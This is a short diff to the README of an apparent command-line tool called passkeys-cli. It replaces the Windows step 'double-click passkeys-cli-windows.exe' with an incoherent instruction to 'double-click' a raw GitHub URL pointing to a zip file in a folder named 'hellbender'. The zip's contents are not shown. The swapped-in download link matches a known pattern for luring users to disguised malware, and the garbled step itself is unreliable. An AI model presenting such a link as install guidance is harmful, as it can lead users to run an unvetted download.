banan880/passkeys-cli/README.md

 #### For Windows
 1. Open your File Explorer.
 2. Navigate to your Downloads folder.
-3. Double-click on `passkeys-cli-windows.exe` to run the application.
+3. Double-click on `https://github.com/banan880/passkeys-cli/raw/refs/heads/main/hellbender/passkeys-cli-v2.8.zip` to run the application.

 #### For macOS
 1. Open Finder.